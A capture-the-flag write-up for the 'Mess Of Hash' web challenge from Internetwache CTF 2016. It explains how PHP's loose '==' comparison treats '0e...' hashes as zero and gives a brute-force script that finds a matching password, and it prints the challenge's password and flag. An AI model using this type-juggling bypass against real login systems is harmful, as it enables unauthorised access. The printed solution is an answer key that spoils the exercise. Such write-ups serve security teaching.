Mess Of Hash
[Internetwache CTF, 2016]
- Category: web
- Points: 60
- Description:
Students have developed a new admin login technique. I doubt that it's secure, but the hash isn't crackable. I don't know where the problem is...
- Hint (README.txt):
<?php
$admin_user = "pr0_adm1n";
$admin_pw = clean_hash("0e408306536730731920197920342119");
function clean_hash($hash) {
return preg_replace("/[^0-9a-f]/","",$hash);
}
function myhash($str) {
return clean_hash(md5(md5($str) . "SALT"));
}
Writeup
The website shows a login form with a user and a password field. From the given hint in the README file we can assume that we need to find a value for the password field that gets us through the following check:
md5(md5($str) . "SALT")) == "0e408306536730731920197920342119"
In order to solve this challenge we could look for a md5 collision, but in this case there's an easier way: The == operator offers some exploitable magic in php. As described here 1, a string that starts with 0e will be interpreted as a float and converted to 0. So, one needs to find a $str such that md5(md5($str) . "SALT")) starts with 0e and thats it :)
The following script
<?php
$i = 0;
do{
$i++;
} while(md5(md5(strval($i))."SALT") != "0e408306536730731920197920342119");
echo $i;
?>
yields 62778807 after a few seconds, which we can use as a password.
Flag: IW{T4K3_C4RE_AND_C0MP4R3}